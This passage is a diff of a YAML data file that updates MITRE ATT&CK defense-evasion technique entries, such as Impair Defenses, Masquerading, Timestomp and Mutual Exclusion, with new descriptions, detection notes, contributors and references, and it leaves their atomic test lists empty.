-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
